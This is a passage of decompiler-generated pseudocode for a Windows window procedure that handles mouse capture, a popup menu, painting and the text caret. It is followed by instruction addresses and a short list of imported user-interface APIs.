                                                  												__eax =  *(__edx + 0x18);
                                                  												_push( *(__edx + 0x18));
                                                  												__ecx = _v8;
                                                  												_push(_v8);
                                                  												__eax = E00404E90();
                                                  											}
                                                  										}
                                                  									}
                                                  									goto L68;
                                                  								}
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 0x84);
                                                  								__eflags =  *(__eax + 0x14);
                                                  								if( *(__eax + 0x14) == 0) {
                                                  									goto L67;
                                                  								}
                                                  								goto L62;
                                                  							case 6:
                                                  								__edx = _v8;
                                                  								__eflags =  *(__edx + 0x84);
                                                  								if( *(__edx + 0x84) == 0) {
                                                  									L57:
                                                  									__ecx = _a12;
                                                  									__edx = _a16;
                                                  									_v8 = E00403F70(_a12, _v8, _a16);
                                                  									__ecx = _v8;
                                                  									__eax = E00405B90(__edi, _v8, __eax, _v8, 0);
                                                  									L58:
                                                  									goto L178;
                                                  								}
                                                  								__eax = _v8;
                                                  								__ecx =  *(_v8 + 0x84);
                                                  								__eflags =  *(__ecx + 0x2c);
                                                  								if( *(__ecx + 0x2c) != 0) {
                                                  									L50:
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eflags =  *( *(_v8 + 0x84) + 0x14);
                                                  									if(__eflags != 0) {
                                                  										_v8 = E00407A80(__eflags, _v8, 0);
                                                  									}
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eflags =  *(__edx + 0x2c);
                                                  									if( *(__edx + 0x2c) == 0) {
                                                  										L55:
                                                  										__ecx = _a16;
                                                  										__edx = _v8;
                                                  										__eax = E00403F70(_a16, _v8, _a16);
                                                  										__ecx = _v8;
                                                  										__edx =  *(_v8 + 0x84);
                                                  										 *( *(_v8 + 0x84) + 0x1c) = __eax;
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 0x84);
                                                  										__edx =  *( *(_v8 + 0x84) + 0x1c);
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 0x84);
                                                  										 *( *(_v8 + 0x84) + 0x18) =  *( *(_v8 + 0x84) + 0x1c);
                                                  										__edx = _v8;
                                                  										 *(__edx + 0xa8) = SetCapture( *(__edx + 0xa8));
                                                  										__ecx = _v8;
                                                  										__eax = E00407A80(__eflags, _v8, 0);
                                                  										__edx = _v8;
                                                  										__eax =  *(_v8 + 0x84);
                                                  										 *( *(_v8 + 0x84) + 0x14) = 1;
                                                  										goto L56;
                                                  									} else {
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 0x84);
                                                  										__eflags =  *(__ecx + 0x14);
                                                  										if( *(__ecx + 0x14) == 0) {
                                                  											goto L55;
                                                  										}
                                                  										__edx = _v8;
                                                  										__eax =  *(_v8 + 0x84);
                                                  										 *( *(_v8 + 0x84) + 0x14) = 0;
                                                  										L56:
                                                  										goto L58;
                                                  									}
                                                  								}
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 0x84);
                                                  								__eflags =  *(__eax + 0x14);
                                                  								if( *(__eax + 0x14) == 0) {
                                                  									goto L57;
                                                  								}
                                                  								goto L50;
                                                  							case 7:
                                                  								__eax = _v8;
                                                  								__eflags =  *(__eax + 0x84);
                                                  								if( *(__eax + 0x84) == 0) {
                                                  									L76:
                                                  									__edx = _a12;
                                                  									__eax = _a16;
                                                  									__ecx = _v8;
                                                  									__eax = E00403F70(_v8, _v8, _a16);
                                                  									__edx = _v8;
                                                  									__eax = E00405B90(__edi, _v8, __eax, _a12, 0);
                                                  									L77:
                                                  									goto L178;
                                                  								}
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 0x84);
                                                  								__eflags =  *(__edx + 0x2c);
                                                  								if( *(__edx + 0x2c) != 0) {
                                                  									L72:
                                                  									__eax = GetCapture();
                                                  									__edx = _v8;
                                                  									__eflags = __eax -  *(__edx + 0xa8);
                                                  									if(__eax ==  *(__edx + 0xa8)) {
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 0x84);
                                                  										__eflags =  *(__ecx + 0x14);
                                                  										if( *(__ecx + 0x14) != 0) {
                                                  											__edx = _a16;
                                                  											__eax = _v8;
                                                  											_push(E00403F70(__ecx, _v8, _a16));
                                                  											__ecx = _v8;
                                                  											__edx =  *(_v8 + 0x84);
                                                  											__eax =  *(__edx + 0x18);
                                                  											_push( *(__edx + 0x18));
                                                  											__ecx = _v8;
                                                  											_push(_v8);
                                                  											E00404E90() = ReleaseCapture();
                                                  										}
                                                  									}
                                                  									goto L77;
                                                  								}
                                                  								__eax = _v8;
                                                  								__ecx =  *(_v8 + 0x84);
                                                  								__eflags =  *(__ecx + 0x14);
                                                  								if( *(__ecx + 0x14) == 0) {
                                                  									goto L76;
                                                  								}
                                                  								goto L72;
                                                  							case 8:
                                                  								__ecx = _a12;
                                                  								__edx = _a16;
                                                  								_v8 = E00403F70(_a12, _v8, _a16);
                                                  								__ecx = _v8;
                                                  								__eax = E00405B90(__edi, _v8, __eax, _v8, 2);
                                                  								goto L178;
                                                  							case 9:
                                                  								__eax = _v8;
                                                  								__eflags =  *(__eax + 0x84);
                                                  								if( *(__eax + 0x84) == 0) {
                                                  									L81:
                                                  									__edx = _a12;
                                                  									__eax = _a16;
                                                  									__ecx = _v8;
                                                  									__eax = E00403F70(_v8, _v8, _a16);
                                                  									__edx = _v8;
                                                  									__eax = E00405B90(__edi, _v8, __eax, _a12, 0);
                                                  									L82:
                                                  									goto L178;
                                                  								}
                                                  								_a12 = _a12 & 0x0000000c;
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 0x84);
                                                  								__eflags = (_a12 & 0x0000000c) -  *((intOrPtr*)(__eax + 0x30));
                                                  								if((_a12 & 0x0000000c) !=  *((intOrPtr*)(__eax + 0x30))) {
                                                  									goto L81;
                                                  								}
                                                  								_a16 = _a16 & 0x0000ffff;
                                                  								__edx = __cx;
                                                  								_v100.x = __cx;
                                                  								_a16 = _a16 >> 0x10;
                                                  								__eax = _a16 >> 0x00000010 & 0x0000ffff;
                                                  								__ecx = __ax;
                                                  								_v100.y = __ax;
                                                  								__edx =  &_v100;
                                                  								_a4 = ClientToScreen(_a4,  &_v100);
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 0x84);
                                                  								__eax =  *( *(_v8 + 0x84) + 0xc);
                                                  								__ecx = _v8;
                                                  								__eax = E00406910(_v8,  *( *(_v8 + 0x84) + 0xc));
                                                  								__edx = _a4;
                                                  								__eax = _v100.y;
                                                  								__ecx = _v100.x;
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 0x84);
                                                  								__ecx =  *(__eax + 0xc);
                                                  								__eax = TrackPopupMenu( *(__eax + 0xc), 2, _v100.x, _v100.y, 0, _a4, 0);
                                                  								goto L82;
                                                  							case 0xa:
                                                  								__eax = _a12;
                                                  								__ecx = _a16;
                                                  								__edx = _v8;
                                                  								E00403F70(_a16, _v8, _a16) = _v8;
                                                  								__eax = E00405B90(__edi, _v8, _v8, _a12, 0);
                                                  								goto L178;
                                                  							case 0xb:
                                                  								__eax = _v8;
                                                  								__ecx =  *(_v8 + 8);
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 8);
                                                  								_v8 =  *(_v8 + 8);
                                                  								 *( *(_v8 + 8) + 0x7c) =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74);
                                                  								__eax =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1;
                                                  								__eflags =  *(__ecx + 0x10) - __eax;
                                                  								if( *(__ecx + 0x10) > __eax) {
                                                  									goto L126;
                                                  								}
                                                  								__ecx = _a12;
                                                  								__edx = _a16;
                                                  								_v8 = E00403F70(_a12, _v8, _a16);
                                                  								__ecx = _v8;
                                                  								__eax = E00405B90(__edi, _v8, __eax, _v8, 4);
                                                  								goto L178;
                                                  							case 0xc:
                                                  								goto L177;
                                                  						}
                                                  					}
                                                  					if(_v16 == 0x111) {
                                                  						_t573 = _v8;
                                                  						__eflags =  *(_t573 + 0x84);
                                                  						if( *(_t573 + 0x84) != 0) {
                                                  							_v28 = _a12;
                                                  							_v28 = _v28 - 0x101;
                                                  							__eflags = _v28 - 0x14;
                                                  							if(__eflags > 0) {
                                                  								L171:
                                                  								return DefWindowProcW(_a4, _a8, _a12, _a16);
                                                  							}
                                                  							_t495 = _v28 + 0x409700; // 0xcccccc06
                                                  							switch( *((intOrPtr*)(( *_t495 & 0x000000ff) * 4 +  &M004096E0))) {
                                                  								case 0:
                                                  									E004024C0(_v8, 0);
                                                  									goto L172;
                                                  								case 1:
                                                  									_v8 = E004024C0(_v8, 1);
                                                  									goto L172;
                                                  								case 2:
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eax = 0;
                                                  									 *( *(_v8 + 0x84) + 0x1a) = __ax;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eax = 0;
                                                  									 *( *(_v8 + 0x84) + 0x18) = __ax;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eax = 0;
                                                  									 *( *(_v8 + 0x84) + 0x1e) = __ax;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eax = 0;
                                                  									 *( *(_v8 + 0x84) + 0x1c) = __ax;
                                                  									__ecx = _v8;
                                                  									__eax = E00407A80(__eflags, _v8, 0);
                                                  									__edx = _v8;
                                                  									__eax =  *(_v8 + 0x84);
                                                  									 *( *(_v8 + 0x84) + 0x14) = 1;
                                                  									goto L172;
                                                  								case 3:
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eflags =  *( *(_v8 + 0x84) + 0x14);
                                                  									if(__eflags != 0) {
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 0x84);
                                                  										 *( *(_v8 + 0x84) + 0x14) = 0;
                                                  										__edx = _v8;
                                                  										E00407A80(__eflags, _v8, 0) = _v8;
                                                  										__eax = E00402740(_v8);
                                                  									}
                                                  									goto L172;
                                                  								case 4:
                                                  									__ecx = _v8;
                                                  									__eax = E004050C0(_v8);
                                                  									goto L172;
                                                  								case 5:
                                                  									__edx = _v8;
                                                  									__eax =  *(_v8 + 0x84);
                                                  									__ecx = 0;
                                                  									 *( *(_v8 + 0x84) + 0x1a) = __cx;
                                                  									__edx = _v8;
                                                  									__eax =  *(_v8 + 0x84);
                                                  									__ecx = 0;
                                                  									 *( *(_v8 + 0x84) + 0x18) = __cx;
                                                  									__edx = _v8;
                                                  									__eax =  *(_v8 + 8);
                                                  									 *(__eax + 0xc) =  *(__eax + 0xc) - 1;
                                                  									__edx = _v8;
                                                  									__eax =  *(_v8 + 0x84);
                                                  									 *( *(_v8 + 0x84) + 0x1c) = __cx;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 8);
                                                  									 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) - 1;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									 *( *(_v8 + 0x84) + 0x1e) = __ax;
                                                  									_v8 = E00407A80(__eflags, _v8, 0);
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									 *( *(_v8 + 0x84) + 0x14) = 1;
                                                  									goto L172;
                                                  								case 6:
                                                  									L172:
                                                  									goto L178;
                                                  								case 7:
                                                  									goto L171;
                                                  							}
                                                  						}
                                                  						goto L178;
                                                  					}
                                                  					_v16 = _v16 - 0x18;
                                                  					if(_v16 > 0xed) {
                                                  						goto L177;
                                                  					}
                                                  					_t19 = _v16 + 0x409490; // 0xfd906602
                                                  					switch( *((intOrPtr*)(( *_t19 & 0x000000ff) * 4 +  &M00409480))) {
                                                  						case 0:
                                                  							__edx = _v8;
                                                  							__eflags =  *(__edx + 0x84);
                                                  							if( *(__edx + 0x84) != 0) {
                                                  								__eflags = _a12;
                                                  								if(_a12 == 0) {
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 0x84);
                                                  									__eflags =  *(__edx + 4);
                                                  									if( *(__edx + 4) != 0) {
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 0x84);
                                                  										__edx =  *(__ecx + 4);
                                                  										__eax = DeleteObject( *(__ecx + 4));
                                                  									}
                                                  									__eax = _v8;
                                                  									__ecx =  *(_v8 + 0x84);
                                                  									 *( *(_v8 + 0x84) + 4) = 0;
                                                  								} else {
                                                  									_v8 = E00407B50(_v8);
                                                  								}
                                                  							}
                                                  							goto L178;
                                                  						case 1:
                                                  							__edx = _v8;
                                                  							__eflags =  *(__edx + 0x84);
                                                  							if( *(__edx + 0x84) == 0) {
                                                  								L38:
                                                  								__eflags = _a8 - 0x100;
                                                  								if(__eflags != 0) {
                                                  									_v44 = 0;
                                                  								} else {
                                                  									_v44 = 1;
                                                  								}
                                                  								__eax = _a16;
                                                  								__ecx = _a12;
                                                  								__edx = _v44;
                                                  								_v8 = E00405A90(__edi, __eflags, _v8, _v44, _a12, _a16);
                                                  								L42:
                                                  								goto L178;
                                                  							}
                                                  							__eax = _v8;
                                                  							__ecx =  *(_v8 + 0x84);
                                                  							__eflags =  *(__ecx + 0x14);
                                                  							if( *(__ecx + 0x14) == 0) {
                                                  								goto L38;
                                                  							}
                                                  							__eflags = _a8 - 0x100;
                                                  							if(_a8 != 0x100) {
                                                  								_v40 = 0;
                                                  							} else {
                                                  								_v40 = 1;
                                                  							}
                                                  							__edx = _a16;
                                                  							_push(_a16);
                                                  							__eax = _a12;
                                                  							__ecx = _v40;
                                                  							__edx = _v8;
                                                  							__eax = E00404300(_a12, _v40, _v8, _v40, _a12);
                                                  							goto L42;
                                                  						case 2:
                                                  							__eflags = _a8 - 0x104;
                                                  							if(__eflags != 0) {
                                                  								_v48 = 0;
                                                  							} else {
                                                  								_v48 = 1;
                                                  							}
                                                  							__ecx = _a16;
                                                  							__edx = _a12;
                                                  							__eax = _v48;
                                                  							__ecx = _v8;
                                                  							__eax = E00405A90(__edi, __eflags, _v8, _v48, _a12, _a16);
                                                  							goto L178;
                                                  						case 3:
                                                  							goto L177;
                                                  					}
                                                  				}
                                                  				if(_v16 == 0xf) {
                                                  					_t637 = _v8;
                                                  					__eflags =  *(_t637 + 0x84);
                                                  					if( *(_t637 + 0x84) != 0) {
                                                  						BeginPaint( *(_v8 + 0xa8),  &_v164);
                                                  						BitBlt(_v164.hdc, 0, 0, ( *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70) + 1) *  *( *(_v8 + 8) + 0x80), ( *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1) *  *( *(_v8 + 8) + 0x82),  *( *(_v8 + 0x84)),  *( *(_v8 + 8) + 0x80) *  *( *(_v8 + 8) + 0x70),  *( *(_v8 + 8) + 0x82) *  *( *(_v8 + 8) + 0x74), 0xcc0020);
                                                  						__eflags =  *( *(_v8 + 0x84) + 0x14);
                                                  						if(__eflags != 0) {
                                                  							E00407A80(__eflags, _v8, _v164);
                                                  						}
                                                  						EndPaint( *(_v8 + 0xa8),  &_v164);
                                                  					}
                                                  					goto L178;
                                                  				}
                                                  				_v16 = _v16 - 1;
                                                  				if(_v16 > 7) {
                                                  					goto L177;
                                                  				}
                                                  				switch( *((intOrPtr*)(_v16 * 4 +  &M00409460))) {
                                                  					case 0:
                                                  						__ecx = _a16;
                                                  						__edx = _a4;
                                                  						return E004086E0(_a4, _a16);
                                                  					case 1:
                                                  						__eax = _v8;
                                                  						 *(_v8 + 0xa8) = 0;
                                                  						PostQuitMessage(0);
                                                  						goto L178;
                                                  					case 2:
                                                  						goto L177;
                                                  					case 3:
                                                  						__edx = _v8;
                                                  						__eflags =  *(__edx + 0x84);
                                                  						if( *(__edx + 0x84) != 0) {
                                                  							__eax = _v8;
                                                  							__ecx =  *(_v8 + 0x84);
                                                  							__eflags =  *((intOrPtr*)(__ecx + 0x64)) - 2;
                                                  							if( *((intOrPtr*)(__ecx + 0x64)) != 2) {
                                                  								_a16 = _a16 >> 0x10;
                                                  								__edx = _a16 >> 0x00000010 & 0x0000ffff;
                                                  								__eax = __dx & 0x0000ffff;
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 8);
                                                  								__ecx =  *( *(_v8 + 8) + 0x82);
                                                  								asm("cdq");
                                                  								_t281 = __eax % __ecx;
                                                  								__eax = __eax / __ecx;
                                                  								__edx = _t281;
                                                  								__eflags = __eax - 0x14;
                                                  								if(__eax <= 0x14) {
                                                  									_v52 = 0x14;
                                                  								} else {
                                                  									_a16 = _a16 >> 0x10;
                                                  									__edx = _a16 >> 0x00000010 & 0x0000ffff;
                                                  									__eax = __dx & 0x0000ffff;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 8);
                                                  									__ecx =  *( *(_v8 + 8) + 0x82);
                                                  									asm("cdq");
                                                  									_t289 = __eax % __ecx;
                                                  									__eax = __eax / __ecx;
                                                  									__edx = _t289;
                                                  									_v52 = __eax;
                                                  								}
                                                  								_a16 = _a16 & 0x0000ffff;
                                                  								__eax = __dx & 0x0000ffff;
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 8);
                                                  								__ecx =  *( *(_v8 + 8) + 0x80);
                                                  								asm("cdq");
                                                  								_t299 = __eax % __ecx;
                                                  								__eax = __eax / __ecx;
                                                  								__edx = _t299;
                                                  								__eflags = __eax - 0x14;
                                                  								if(__eflags <= 0) {
                                                  									_v56 = 0x14;
                                                  								} else {
                                                  									_a16 = _a16 & 0x0000ffff;
                                                  									__eax = __dx & 0x0000ffff;
                                                  									__ecx = _v8;
                                                  									__edx =  *(_v8 + 8);
                                                  									__ecx =  *( *(_v8 + 8) + 0x80);
                                                  									asm("cdq");
                                                  									_t307 = __eax % __ecx;
                                                  									__eax = __eax / __ecx;
                                                  									__edx = _t307;
                                                  									_v56 = __eax;
                                                  								}
                                                  								__edx = _v52;
                                                  								__eax = _v56;
                                                  								__ecx = _v8;
                                                  								__eax = E00405C60(__eflags, _v8, _v56, _v52);
                                                  							}
                                                  						}
                                                  						goto L178;
                                                  					case 4:
                                                  						__edx = _v8;
                                                  						__eflags =  *(__edx + 0x84);
                                                  						if( *(__edx + 0x84) != 0) {
                                                  							__eax = _v8;
                                                  							__ecx =  *(_v8 + 8);
                                                  							__eflags =  *(__ecx + 0x18);
                                                  							if( *(__ecx + 0x18) != 0) {
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 8);
                                                  								__ecx =  *( *(_v8 + 8) + 0x82);
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 8);
                                                  								__ecx =  *( *(_v8 + 8) + 0x80);
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 0x84);
                                                  								__ecx =  *( *(_v8 + 0x84) + 0x10);
                                                  								__edx = _v8;
                                                  								 *(__edx + 0xa8) = CreateCaret( *(__edx + 0xa8),  *( *(_v8 + 0x84) + 0x10),  *( *(_v8 + 8) + 0x80),  *( *(_v8 + 8) + 0x82));
                                                  								__ecx = _v8;
                                                  								__eax = E004083F0(_v8);
                                                  							}
                                                  						}
                                                  						goto L178;
                                                  					case 5:
                                                  						__edx = _v8;
                                                  						__eflags =  *(__edx + 0x84);
                                                  						if( *(__edx + 0x84) != 0) {
                                                  							__eax = _v8;
                                                  							__ecx =  *(_v8 + 8);
                                                  							__eflags =  *(__ecx + 0x18);
                                                  							if( *(__ecx + 0x18) != 0) {
                                                  								__eax = DestroyCaret();
                                                  							}
                                                  						}
                                                  						goto L178;
                                                  				}
                                                  			}
                                                  0x00408f78
                                                  0x00000000
                                                  0x00408f98
                                                  0x00408f9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00408fa3
                                                  0x00408fa6
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f82
                                                  0x00408f85
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f8d
                                                  0x00408f90
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408fae
                                                  0x00408fb1
                                                  0x00408fb1
                                                  0x00408fb6
                                                  0x00408fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00408f78
                                                  0x00000000
                                                  0x00000000
                                                  0x00409091
                                                  0x00409091
                                                  0x00409094
                                                  0x00409097
                                                  0x0040909a
                                                  0x004090a0
                                                  0x004090a3
                                                  0x004090a6
                                                  0x004090a9
                                                  0x004090ac
                                                  0x004090af
                                                  0x004090b2
                                                  0x004090b5
                                                  0x004090b8
                                                  0x004090bf
                                                  0x004090c6
                                                  0x004090cd
                                                  0x00409111
                                                  0x00409116
                                                  0x00409119
                                                  0x0040911c
                                                  0x00409120
                                                  0x0040916a
                                                  0x0040916a
                                                  0x0040916e
                                                  0x00409178
                                                  0x00409170
                                                  0x00409170
                                                  0x00409173
                                                  0x00409173
                                                  0x0040917f
                                                  0x00409182
                                                  0x00409188
                                                  0x0040918b
                                                  0x0040918e
                                                  0x004091ad
                                                  0x004091b0
                                                  0x004091b3
                                                  0x004091b6
                                                  0x004091b6
                                                  0x004091b9
                                                  0x00409190
                                                  0x00409190
                                                  0x00409194
                                                  0x0040919e
                                                  0x00409196
                                                  0x00409196
                                                  0x00409199
                                                  0x00409199
                                                  0x004091a5
                                                  0x004091a8
                                                  0x004091a8
                                                  0x004091bc
                                                  0x004091bf
                                                  0x004091c2
                                                  0x004091c5
                                                  0x004091c8
                                                  0x004091cb
                                                  0x004091ce
                                                  0x004091d0
                                                  0x004091d3
                                                  0x004091d6
                                                  0x004091d9
                                                  0x004091dc
                                                  0x004091df
                                                  0x004091e2
                                                  0x004091e2
                                                  0x004091e6
                                                  0x004091e9
                                                  0x004091ec
                                                  0x004091f3
                                                  0x004091f3
                                                  0x00000000
                                                  0x004091f8
                                                  0x00409122
                                                  0x00409125
                                                  0x00000000
                                                  0x00409145
                                                  0x00409148
                                                  0x00000000
                                                  0x00000000
                                                  0x00409150
                                                  0x00409153
                                                  0x00000000
                                                  0x00000000
                                                  0x0040912f
                                                  0x00409132
                                                  0x00000000
                                                  0x00000000
                                                  0x0040913a
                                                  0x0040913d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040915b
                                                  0x0040915e
                                                  0x0040915e
                                                  0x00409164
                                                  0x00409167
                                                  0x00000000
                                                  0x00000000
                                                  0x00409125
                                                  0x004090cf
                                                  0x004090d8
                                                  0x004090e6
                                                  0x004090e9
                                                  0x004090ec
                                                  0x004090f1
                                                  0x004090f2
                                                  0x004090f4
                                                  0x004090f5
                                                  0x004090fa
                                                  0x004090fa
                                                  0x004090fa
                                                  0x00409100
                                                  0x00409106
                                                  0x00409109
                                                  0x00000000
                                                  0x00409109
                                                  0x00000000
                                                  0x00000000
                                                  0x004093eb
                                                  0x004093ee
                                                  0x004093f5
                                                  0x0040940a
                                                  0x0040940a
                                                  0x0040940e
                                                  0x00409412
                                                  0x00409416
                                                  0x00000000
                                                  0x0040941a
                                                  0x004093fa
                                                  0x004093fd
                                                  0x00409403
                                                  0x00409406
                                                  0x00409408
                                                  0x00409424
                                                  0x0040942e
                                                  0x00409435
                                                  0x00409439
                                                  0x00000000
                                                  0x00409439
                                                  0x00000000
                                                  0x00000000
                                                  0x00408bb5
                                                  0x00408bb8
                                                  0x00408bbf
                                                  0x00408c2d
                                                  0x00408c2f
                                                  0x00408c33
                                                  0x00408c37
                                                  0x00408c3b
                                                  0x00408c41
                                                  0x00408c45
                                                  0x00408c4a
                                                  0x00000000
                                                  0x00408c4a
                                                  0x00408bc1
                                                  0x00408bc4
                                                  0x00408bca
                                                  0x00408bce
                                                  0x00408bdf
                                                  0x00408bdf
                                                  0x00408be5
                                                  0x00408be8
                                                  0x00408bee
                                                  0x00408bf0
                                                  0x00408bf3
                                                  0x00408bf9
                                                  0x00408bfd
                                                  0x00408bff
                                                  0x00408c02
                                                  0x00408c02
                                                  0x00408c05
                                                  0x00408c07
                                                  0x00408c0b
                                                  0x00408c14
                                                  0x00408c15
                                                  0x00408c18
                                                  0x00408c1e
                                                  0x00408c21
                                                  0x00408c22
                                                  0x00408c25
                                                  0x00408c26
                                                  0x00408c26
                                                  0x00408c05
                                                  0x00408bfd
                                                  0x00000000
                                                  0x00408c2b
                                                  0x00408bd0
                                                  0x00408bd3
                                                  0x00408bd9
                                                  0x00408bdd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408ab9
                                                  0x00408abc
                                                  0x00408ac3
                                                  0x00408b93
                                                  0x00408b95
                                                  0x00408b99
                                                  0x00408ba1
                                                  0x00408ba7
                                                  0x00408bab
                                                  0x00408bb0
                                                  0x00000000
                                                  0x00408bb0
                                                  0x00408ac9
                                                  0x00408acc
                                                  0x00408ad2
                                                  0x00408ad6
                                                  0x00408aeb
                                                  0x00408aeb
                                                  0x00408aee
                                                  0x00408af4
                                                  0x00408af8
                                                  0x00408b00
                                                  0x00408b00
                                                  0x00408b05
                                                  0x00408b08
                                                  0x00408b0e
                                                  0x00408b12
                                                  0x00408b35
                                                  0x00408b35
                                                  0x00408b39
                                                  0x00408b3d
                                                  0x00408b42
                                                  0x00408b45
                                                  0x00408b4b
                                                  0x00408b4e
                                                  0x00408b51
                                                  0x00408b57
                                                  0x00408b5a
                                                  0x00408b5d
                                                  0x00408b63
                                                  0x00408b66
                                                  0x00408b70
                                                  0x00408b78
                                                  0x00408b7c
                                                  0x00408b81
                                                  0x00408b84
                                                  0x00408b8a
                                                  0x00000000
                                                  0x00408b14
                                                  0x00408b14
                                                  0x00408b17
                                                  0x00408b1d
                                                  0x00408b21
                                                  0x00000000
                                                  0x00000000
                                                  0x00408b23
                                                  0x00408b26
                                                  0x00408b2c
                                                  0x00408b91
                                                  0x00000000
                                                  0x00408b91
                                                  0x00408b12
                                                  0x00408ad8
                                                  0x00408adb
                                                  0x00408ae1
                                                  0x00408ae5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408c4f
                                                  0x00408c52
                                                  0x00408c59
                                                  0x00408cc5
                                                  0x00408cc7
                                                  0x00408ccb
                                                  0x00408ccf
                                                  0x00408cd3
                                                  0x00408cd9
                                                  0x00408cdd
                                                  0x00408ce2
                                                  0x00000000
                                                  0x00408ce2
                                                  0x00408c5b
                                                  0x00408c5e
                                                  0x00408c64
                                                  0x00408c68
                                                  0x00408c79
                                                  0x00408c79
                                                  0x00408c7f
                                                  0x00408c82
                                                  0x00408c88
                                                  0x00408c8a
                                                  0x00408c8d
                                                  0x00408c93
                                                  0x00408c97
                                                  0x00408c99
                                                  0x00408c9d
                                                  0x00408ca6
                                                  0x00408ca7
                                                  0x00408caa
                                                  0x00408cb0
                                                  0x00408cb3
                                                  0x00408cb4
                                                  0x00408cb7
                                                  0x00408cbd
                                                  0x00408cbd
                                                  0x00408c97
                                                  0x00000000
                                                  0x00408cc3
                                                  0x00408c6a
                                                  0x00408c6d
                                                  0x00408c73
                                                  0x00408c77
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00408db8
                                                  0x00408dbc
                                                  0x00408dc4
                                                  0x00408dca
                                                  0x00408dce
                                                  0x00000000
                                                  0x00000000
                                                  0x00408ce7
                                                  0x00408cea
                                                  0x00408cf1
                                                  0x00408d72
                                                  0x00408d74
                                                  0x00408d78
                                                  0x00408d7c
                                                  0x00408d80
                                                  0x00408d86
                                                  0x00408d8a
                                                  0x00408d8f
                                                  0x00000000
                                                  0x00408d8f
                                                  0x00408cf6
                                                  0x00408cf9
                                                  0x00408cfc
                                                  0x00408d02
                                                  0x00408d05
                                                  0x00000000
                                                  0x00000000
                                                  0x00408d0a
                                                  0x00408d10
                                                  0x00408d13
                                                  0x00408d19
                                                  0x00408d1c
                                                  0x00408d21
                                                  0x00408d24
                                                  0x00408d27
                                                  0x00408d2f
                                                  0x00408d35
                                                  0x00408d38
                                                  0x00408d3e
                                                  0x00408d42
                                                  0x00408d46
                                                  0x00408d4d
                                                  0x00408d53
                                                  0x00408d57
                                                  0x00408d5d
                                                  0x00408d60
                                                  0x00408d66
                                                  0x00408d6a
                                                  0x00000000
                                                  0x00000000
                                                  0x00408d96
                                                  0x00408d9a
                                                  0x00408d9e
                                                  0x00408da8
                                                  0x00408dac
                                                  0x00000000
                                                  0x00000000
                                                  0x0040904f
                                                  0x00409052
                                                  0x00409055
                                                  0x00409058
                                                  0x0040905e
                                                  0x00409064
                                                  0x00409067
                                                  0x0040906a
                                                  0x0040906d
                                                  0x00000000
                                                  0x00000000
                                                  0x00409071
                                                  0x00409075
                                                  0x0040907d
                                                  0x00409083
                                                  0x00409087
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040884d
                                                  0x004087eb
                                                  0x00409262
                                                  0x00409265
                                                  0x0040926c
                                                  0x00409276
                                                  0x00409282
                                                  0x00409285
                                                  0x00409289
                                                  0x004093d1
                                                  0x00000000
                                                  0x004093e1
                                                  0x00409292
                                                  0x00409299
                                                  0x00000000
                                                  0x004092a6
                                                  0x00000000
                                                  0x00000000
                                                  0x004092b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004092c0
                                                  0x004092c3
                                                  0x004092c9
                                                  0x004092cb
                                                  0x004092cf
                                                  0x004092d2
                                                  0x004092d8
                                                  0x004092da
                                                  0x004092de
                                                  0x004092e1
                                                  0x004092e7
                                                  0x004092e9
                                                  0x004092ed
                                                  0x004092f0
                                                  0x004092f6

                                                  APIs
                                                  • GetWindowLongW.USER32(?,00000000), ref: 0040879F
                                                  • PostQuitMessage.USER32(00000000), ref: 0040887A
                                                  • DefWindowProcW.USER32(?,00000401,?,?), ref: 00409450
